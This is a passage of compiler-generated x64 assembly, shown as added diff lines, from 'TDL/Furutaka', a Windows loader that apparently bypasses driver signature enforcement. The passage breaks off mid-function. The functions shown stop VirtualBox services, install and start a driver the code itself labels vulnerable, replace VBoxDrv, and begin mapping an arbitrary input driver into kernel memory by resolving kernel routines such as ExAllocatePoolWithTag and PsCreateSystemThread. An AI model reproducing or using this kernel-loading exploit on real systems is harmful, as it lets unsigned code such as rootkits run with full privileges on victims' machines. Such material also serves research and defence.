+ call ultostr_w
+; Line 772
+ lea rdx, OFFSET FLAT:??_C@_13JOFGPIOO@?$AA?4@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcat_w
+; Line 773
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov ecx, DWORD PTR osv$[rsp+8]
+ mov rdx, rax
+ call ultostr_w
+; Line 774
+ lea rdx, OFFSET FLAT:??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcat_w
+; Line 775
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov ecx, DWORD PTR osv$[rsp+12]
+ mov rdx, rax
+ call ultostr_w
+; Line 776
+ mov edx, 1
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; Line 782
+ call TDLVBoxInstalled
+ mov DWORD PTR g_VBoxInstalled, eax
+; Line 783
+ test eax, eax
+ je SHORT $LN7@TDLMain
+; Line 784
+ mov edx, 1
+ lea rcx, OFFSET FLAT:??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
+ call cuiPrintTextW
+$LN7@TDLMain:
+; Line 787
+ call QWORD PTR __imp_GetCommandLineW
+ mov rcx, rax
+ call TDLProcessCommandLine
+$LN3@TDLMain:
+; Line 791
+ lock dec DWORD PTR g_lApplicationInstances
+; Line 792
+ mov ecx, eax
+ call QWORD PTR __imp_ExitProcess
+ int 3
+$LN11@TDLMain:
+TDLMain ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLProcessCommandLine
+_TEXT SEGMENT
+szInputFile$ = 48
+lpCommandLine$ = 592
+c$ = 600
+TDLProcessCommandLine PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 698
+$LN11:
+ mov r11, rsp
+ mov QWORD PTR [r11+8], rbx
+ push rdi
+ sub rsp, 576 ; 00000240H
+; Line 704
+ and DWORD PTR [r11+16], 0
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR szInputFile$[rsp]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 698
+ mov r10, rcx
+; Line 706
+ lea r8, QWORD PTR szInputFile$[rsp]
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+ mov ecx, 522 ; 0000020aH
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 706
+ lea rax, QWORD PTR [r11+16]
+ mov rcx, r10
+ mov r9d, 260 ; 00000104H
+ mov QWORD PTR [rsp+32], rax
+ mov edx, 1
+ or ebx, -1 ; ffffffffH
+ call GetCommandLineParamW
+; Line 707
+ cmp DWORD PTR c$[rsp], 0
+ jne SHORT $LN2@TDLProcess
+; Line 708
+ lea rcx, OFFSET FLAT:??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
+; Line 709
+ jmp SHORT $LN9@TDLProcess
+$LN2@TDLProcess:
+; Line 712
+ lea rcx, QWORD PTR szInputFile$[rsp]
+ call QWORD PTR __imp_GetFileAttributesW
+ cmp eax, ebx
+ je SHORT $LN3@TDLProcess
+; Line 713
+ call TDLStartVulnerableDriver
+ mov QWORD PTR g_hVBox, rax
+; Line 714
+ cmp rax, -1
+ je SHORT $LN4@TDLProcess
+; Line 715
+ lea rcx, QWORD PTR szInputFile$[rsp]
+ call TDLMapDriver
+ mov ebx, eax
+; Line 716
+ call TDLStopVulnerableDriver
+; Line 718
+ jmp SHORT $LN4@TDLProcess
+$LN3@TDLProcess:
+; Line 720
+ lea rcx, OFFSET FLAT:??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
+$LN9@TDLProcess:
+; Line 723
+ xor edx, edx
+ call cuiPrintTextW
+$LN4@TDLProcess:
+ mov eax, ebx
+ mov rbx, QWORD PTR [rsp+592]
+ add rsp, 576 ; 00000240H
+ pop rdi
+ ret 0
+TDLProcessCommandLine ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLStopVulnerableDriver
+_TEXT SEGMENT
+uStr$ = 32
+ObjectAttributes$ = 48
+TDLStopVulnerableDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 623
+$LN16:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ push rdi
+ sub rsp, 96 ; 00000060H
+; Line 629
+ mov edi, 1
+ lea rcx, OFFSET FLAT:??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@
+ mov edx, edi
+ call cuiPrintTextW
+; Line 631
+ mov rcx, QWORD PTR g_hVBox
+ cmp rcx, -1
+ je SHORT $LN2@TDLStopVul
+; Line 632
+ call QWORD PTR __imp_CloseHandle
+$LN2@TDLStopVul:
+; Line 634
+ xor edx, edx
+ xor ecx, ecx
+ mov r8d, 983103 ; 000f003fH
+ call QWORD PTR __imp_OpenSCManagerW
+; Line 639
+ xor esi, esi
+ mov rbx, rax
+ test rax, rax
+ jne SHORT $LN3@TDLStopVul
+; Line 640
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@
+ call cuiPrintTextW
+; Line 641
+ jmp $LN1@TDLStopVul
+$LN3@TDLStopVul:
+; Line 645
+ lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
+ mov rcx, rbx
+ call scmStopDriver
+ test eax, eax
+ lea r8, OFFSET FLAT:??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
+ lea rcx, OFFSET FLAT:??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+; Line 650
+ mov edx, edi
+ cmove rcx, r8
+ call cuiPrintTextW
+; Line 653
+ cmp DWORD PTR g_VBoxInstalled, esi
+ jne $LN6@TDLStopVul
+; Line 655
+ lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
+ mov rcx, rbx
+ call scmRemoveDriver
+ lea rdx, OFFSET FLAT:??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
+ test eax, eax
+ lea rcx, OFFSET FLAT:??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@
+ cmove rcx, rdx
+; Line 660
+ mov edx, edi
+ call cuiPrintTextW
+; Line 665
+ lea rdx, OFFSET FLAT:??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@
+ mov QWORD PTR uStr$[rsp+8], rsi
+ lea rcx, QWORD PTR uStr$[rsp]
+ mov DWORD PTR uStr$[rsp], esi
+ call QWORD PTR __imp_RtlInitUnicodeString
+; Line 666
+ lea rax, QWORD PTR uStr$[rsp]
+ mov DWORD PTR ObjectAttributes$[rsp], 48 ; 00000030H
+ xorps xmm0, xmm0
+ mov QWORD PTR ObjectAttributes$[rsp+16], rax
+; Line 667
+ lea rcx, QWORD PTR ObjectAttributes$[rsp]
+ mov QWORD PTR ObjectAttributes$[rsp+8], rsi
+ movdqu XMMWORD PTR ObjectAttributes$[rsp+32], xmm0
+ mov DWORD PTR ObjectAttributes$[rsp+24], 64 ; 00000040H
+ call QWORD PTR __imp_NtDeleteFile
+ test eax, eax
+ lea rcx, OFFSET FLAT:??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@
+ lea rdx, OFFSET FLAT:??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
+ cmovs rcx, rdx
+; Line 674
+ jmp SHORT $LN12@TDLStopVul
+$LN6@TDLStopVul:
+; Line 677
+ mov ecx, edi
+ call supBackupVBoxDrv
+ test eax, eax
+ lea rcx, OFFSET FLAT:??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@
+ lea rdx, OFFSET FLAT:??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
+ cmove rcx, rdx
+$LN12@TDLStopVul:
+; Line 684
+ mov edx, edi
+ call cuiPrintTextW
+ mov rcx, rbx
+ call QWORD PTR __imp_CloseServiceHandle
+$LN1@TDLStopVul:
+; Line 685
+ mov rbx, QWORD PTR [rsp+112]
+ mov rsi, QWORD PTR [rsp+120]
+ add rsp, 96 ; 00000060H
+ pop rdi
+ ret 0
+TDLStopVulnerableDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLStartVulnerableDriver
+_TEXT SEGMENT
+szDriverFileName$ = 48
+DataSize$ = 1120
+hDevice$ = 1128
+TDLStartVulnerableDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 501
+$LN28:
+ mov QWORD PTR [rsp+24], rbx
+ mov QWORD PTR [rsp+32], rsi
+ push rbp
+ push rdi
+ push r15
+ lea rbp, QWORD PTR [rsp-832]
+ sub rsp, 1088 ; 00000440H
+; Line 510
+ mov rdx, QWORD PTR g_hInstance
+ lea r8, QWORD PTR DataSize$[rbp-256]
+ and DWORD PTR DataSize$[rbp-256], 0
+ or rdi, -1
+ mov QWORD PTR hDevice$[rbp-256], rdi
+ xor ebx, ebx
+ lea r15d, QWORD PTR [rdi+2]
+ mov ecx, r15d
+ call supQueryResourceData
+ mov rsi, rax
+; Line 511
+ test rax, rax
+ jne SHORT $LN4@TDLStartVu
+; Line 512
+ mov rax, rdi
+ jmp $LN1@TDLStartVu
+$LN4@TDLStartVu:
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+ lea rdi, QWORD PTR szDriverFileName$[rsp]
+ mov ecx, 1040 ; 00000410H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 518
+ mov edx, 260 ; 00000104H
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 518
+ lea rcx, QWORD PTR szDriverFileName$[rsp]
+ call QWORD PTR __imp_GetSystemDirectoryW
+ test eax, eax
+ jne SHORT $LN6@TDLStartVu
+; Line 519
+ lea rcx, OFFSET FLAT:??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@
+; Line 520
+ jmp $LN3@TDLStartVu
+$LN6@TDLStartVu:
+; Line 523
+ xor edx, edx
+ xor ecx, ecx
+ mov r8d, 983103 ; 000f003fH
+ call QWORD PTR __imp_OpenSCManagerW
+ mov rbx, rax
+; Line 524
+ test rax, rax
+ jne SHORT $LN7@TDLStartVu
+; Line 525
+ lea rcx, OFFSET FLAT:??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@
+; Line 526
+ jmp $LN3@TDLStartVu
+$LN7@TDLStartVu:
+; Line 532
+ lea rdi, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
+ mov rdx, rdi
+ lea rcx, OFFSET FLAT:??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@
+ call supIsObjectExists
+ test al, al
+ je $LN12@TDLStartVu
+; Line 534
+ mov edx, r15d
+ lea rcx, OFFSET FLAT:??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@
+ call cuiPrintTextW
+; Line 536
+ lea rdx, OFFSET FLAT:??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@
+ mov rcx, rbx
+ call supStopVBoxService
+ test al, al
+ jne SHORT $LN9@TDLStartVu
+; Line 537
+ lea rcx, OFFSET FLAT:??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+; Line 538
+ jmp $LN3@TDLStartVu
+$LN9@TDLStartVu:
+; Line 541
+ lea rdx, OFFSET FLAT:??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@
+ mov rcx, rbx
+ call supStopVBoxService
+ test al, al
+ jne SHORT $LN10@TDLStartVu
+; Line 542
+ lea rcx, OFFSET FLAT:??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+; Line 543
+ jmp $LN3@TDLStartVu
+$LN10@TDLStartVu:
+; Line 546
+ lea rdx, OFFSET FLAT:??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@
+ mov rcx, rbx
+ call supStopVBoxService
+ test al, al
+ jne SHORT $LN11@TDLStartVu
+; Line 547
+ lea rcx, OFFSET FLAT:??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+; Line 548
+ jmp $LN3@TDLStartVu
+$LN11@TDLStartVu:
+; Line 551
+ mov ecx, 1000 ; 000003e8H
+ call QWORD PTR __imp_Sleep
+; Line 553
+ mov rdx, rdi
+ mov rcx, rbx
+ call supStopVBoxService
+ test al, al
+ jne SHORT $LN12@TDLStartVu
+; Line 554
+ lea rcx, OFFSET FLAT:??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@
+; Line 555
+ jmp $LN3@TDLStartVu
+$LN12@TDLStartVu:
+; Line 564
+ cmp DWORD PTR g_VBoxInstalled, 0
+ je SHORT $LN15@TDLStartVu
+; Line 565
+ xor ecx, ecx
+ call supBackupVBoxDrv
+; Line 566
+ lea rcx, OFFSET FLAT:??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+ mov edx, r15d
+ test eax, eax
+ je SHORT $LN26@TDLStartVu
+; Line 569
+ lea rcx, OFFSET FLAT:??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@
+$LN26@TDLStartVu:
+; Line 574
+ call cuiPrintTextW
+$LN15@TDLStartVu:
+ lea rdx, OFFSET FLAT:??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@
+ lea rcx, QWORD PTR szDriverFileName$[rsp]
+ call _strcat_w
+; Line 575
+ mov r8d, DWORD PTR DataSize$[rbp-256]
+ lea rcx, QWORD PTR szDriverFileName$[rsp]
+ and DWORD PTR [rsp+32], 0
+ xor r9d, r9d
+ mov rdx, rsi
+ call supWriteBufferToFile
+; Line 578
+ cmp eax, DWORD PTR DataSize$[rbp-256]
+ je SHORT $LN16@TDLStartVu
+; Line 579
+ lea rcx, OFFSET FLAT:??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@
+; Line 580
+ jmp SHORT $LN3@TDLStartVu
+$LN16@TDLStartVu:
+; Line 584
+ cmp DWORD PTR g_VBoxInstalled, 0
+ jne SHORT $LN17@TDLStartVu
+; Line 585
+ lea r8, QWORD PTR szDriverFileName$[rsp]
+ mov rdx, rdi
+ mov rcx, rbx
+ call scmInstallDriver
+$LN17@TDLStartVu:
+; Line 589
+ mov rdx, rdi
+ mov rcx, rbx
+ call scmStartDriver
+ test eax, eax
+ je SHORT $LN18@TDLStartVu
+; Line 591
+ lea rdx, QWORD PTR hDevice$[rbp-256]
+ mov rcx, rdi
+ call scmOpenDevice
+ test eax, eax
+ lea rcx, OFFSET FLAT:??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+ lea rdx, OFFSET FLAT:??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@
+ cmove rcx, rdx
+; Line 596
+ jmp SHORT $LN3@TDLStartVu
+$LN18@TDLStartVu:
+; Line 598
+ lea rcx, OFFSET FLAT:??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+$LN3@TDLStartVu:
+; Line 606
+ mov edx, r15d
+ call cuiPrintTextW
+ test rbx, rbx
+ je SHORT $LN22@TDLStartVu
+; Line 607
+ mov rcx, rbx
+ call QWORD PTR __imp_CloseServiceHandle
+$LN22@TDLStartVu:
+; Line 609
+ mov rax, QWORD PTR hDevice$[rbp-256]
+$LN1@TDLStartVu:
+; Line 610
+ lea r11, QWORD PTR [rsp+1088]
+ mov rbx, QWORD PTR [r11+48]
+ mov rsi, QWORD PTR [r11+56]
+ mov rsp, r11
+ pop r15
+ pop rdi
+ pop rbp
+ ret 0
+TDLStartVulnerableDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLMapDriver
+_TEXT SEGMENT
+Image$ = 48
+xExAllocatePoolWithTag$ = 56
+xPsCreateSystemThread$ = 64
+xZwClose$ = 72
+memIO$ = 80
+routineName$ = 88
+uStr$ = 104
+text$ = 128
+lpDriverFullName$ = 704
+DllCharacteristics$ = 712
+Buffer$ = 720
+KernelImage$ = 728
+TDLMapDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 323
+$LN35:
+ mov QWORD PTR [rsp+8], rbx
+ push rbp
+ push rsi
+ push rdi
+ push r12
+ push r13
+ push r14
+ push r15
+ lea rbp, QWORD PTR [rsp-384]
+ sub rsp, 640 ; 00000280H
+; Line 328
+ xor r13d, r13d
+ mov esi, 2
+ mov DWORD PTR DllCharacteristics$[rbp-256], esi
+ mov r14, rcx
+ mov QWORD PTR KernelImage$[rbp-256], r13
+ or r15d, -1 ; ffffffffH
+; Line 329
+ mov QWORD PTR xExAllocatePoolWithTag$[rsp], r13
+ mov QWORD PTR xPsCreateSystemThread$[rsp], r13
+ mov QWORD PTR xZwClose$[rsp], r13
+; Line 330
+ mov QWORD PTR Image$[rsp], r13
+; Line 332
+ mov QWORD PTR Buffer$[rbp-256], r13
+; Line 338
+ call supGetNtOsBase
+ mov rbx, rax
+; Line 339
+ test rax, rax
+ je $LN3@TDLMapDriv
+; Line 341
+ lea rdx, OFFSET FLAT:??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 342
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rdx, rax
+ mov rcx, rbx
+ call u64tohex_w
+; Line 343
+ lea r12d, QWORD PTR [rsi-1]
+ mov edx, r12d
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+ lea ecx, QWORD PTR [rsi+14]
+ lea rdi, QWORD PTR uStr$[rsp]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 346
+ mov rdx, r14
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 346
+ lea rcx, QWORD PTR uStr$[rsp]
+ call QWORD PTR __imp_RtlInitUnicodeString
+; Line 347
+ lea r9, QWORD PTR Image$[rsp]
+ xor ecx, ecx
+ lea r8, QWORD PTR uStr$[rsp]
+ lea rdx, QWORD PTR DllCharacteristics$[rbp-256]
+ call QWORD PTR __imp_LdrLoadDll
+; Line 348
+ test eax, eax
+ js $LN6@TDLMapDriv
+ cmp QWORD PTR Image$[rsp], r13
+ je $LN6@TDLMapDriv
+; Line 353
+ lea rdx, OFFSET FLAT:??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 354
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, QWORD PTR Image$[rsp]
+ mov rdx, rax
+ call u64tohex_w
+; Line 355
+ mov edx, r12d
+ lea rcx, QWORD PTR text$[rbp-256]
+ mov edi, r12d
+ call cuiPrintTextW
+; Line 358
+ mov rcx, QWORD PTR Image$[rsp]
+ call QWORD PTR __imp_RtlImageNtHeader
+; Line 359
+ test rax, rax
+ je $LN3@TDLMapDriv
+; Line 362
+ mov r12d, DWORD PTR [rax+80]
+; Line 364
+ lea rcx, OFFSET FLAT:??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@
+ mov edx, edi
+ call cuiPrintTextW
+; Line 366
+ lea rdx, OFFSET FLAT:??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@
+ lea rcx, QWORD PTR uStr$[rsp]
+ call QWORD PTR __imp_RtlInitUnicodeString
+; Line 367
+ lea r9, QWORD PTR KernelImage$[rbp-256]
+ xor edx, edx
+ lea r8, QWORD PTR uStr$[rsp]
+ xor ecx, ecx
+ call QWORD PTR __imp_LdrLoadDll
+; Line 368
+ test eax, eax
+ js $LN10@TDLMapDriv
+ cmp QWORD PTR KernelImage$[rbp-256], r13
+ je $LN10@TDLMapDriv
+; Line 373
+ lea rdx, OFFSET FLAT:??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 374
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, QWORD PTR KernelImage$[rbp-256]
+ mov rdx, rax
+ call u64tohex_w
+; Line 375
+ mov edx, edi
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; Line 378
+ lea rdx, OFFSET FLAT:??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@
+ lea rcx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_RtlInitString
+; Line 379
+ mov rcx, QWORD PTR KernelImage$[rbp-256]
+ lea r9, QWORD PTR xExAllocatePoolWithTag$[rsp]
+ xor r8d, r8d
+ lea rdx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_LdrGetProcedureAddress
+; Line 380
+ test eax, eax
+ js $LN13@TDLMapDriv
+ cmp QWORD PTR xExAllocatePoolWithTag$[rsp], r13
+ je $LN13@TDLMapDriv
+; Line 385
+ lea rdx, OFFSET FLAT:??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 386
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, rbx
+ mov rdx, rax
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp]
+ call u64tohex_w
+; Line 387
+ mov edx, edi
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; Line 390
+ mov r14d, 15063 ; 00003ad7H
+ cmp DWORD PTR g_NtBuildNumber, r14d
+ jae $LN19@TDLMapDriv
+; Line 391
+ lea rdx, OFFSET FLAT:??_C@_0BF@OLMDGEDM@PsCreateSystemThread@
+ lea rcx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_RtlInitString
+; Line 392
+ mov rcx, QWORD PTR KernelImage$[rbp-256]
+ lea r9, QWORD PTR xPsCreateSystemThread$[rsp]
+ xor r8d, r8d
+ lea rdx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_LdrGetProcedureAddress
+; Line 393
+ test eax, eax
+ js $LN17@TDLMapDriv
+ cmp QWORD PTR xPsCreateSystemThread$[rsp], r13
+ je $LN17@TDLMapDriv
+; Line 398
+ lea rdx, OFFSET FLAT:??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 399
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, rbx
+ mov rdx, rax
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ add rcx, QWORD PTR xPsCreateSystemThread$[rsp]
+ call u64tohex_w
+; Line 400
+ mov edx, edi
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; Line 403
+ lea rdx, OFFSET FLAT:??_C@_07IPICGNAN@ZwClose@
+ lea rcx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_RtlInitString
+; Line 404
+ mov rcx, QWORD PTR KernelImage$[rbp-256]
+ lea r9, QWORD PTR xZwClose$[rsp]
+ xor r8d, r8d
+ lea rdx, QWORD PTR routineName$[rsp]
+ call QWORD PTR __imp_LdrGetProcedureAddress
+; Line 405
+ test eax, eax
+ js $LN20@TDLMapDriv
+ cmp QWORD PTR xZwClose$[rsp], r13
+ je $LN20@TDLMapDriv
+; Line 410
+ lea rdx, OFFSET FLAT:??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 411
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, rbx
+ mov rdx, rax
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ add rcx, QWORD PTR xZwClose$[rsp]
+ call u64tohex_w
+; Line 412
+ mov edx, edi
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+$LN19@TDLMapDriv:
+; Line 416
+ lea rax, QWORD PTR [r12+4096]
+; Line 417
+ mov DWORD PTR [rsp+40], 64 ; 00000040H
+ lea r9, QWORD PTR memIO$[rsp]
+ mov QWORD PTR memIO$[rsp], rax
+ xor r8d, r8d
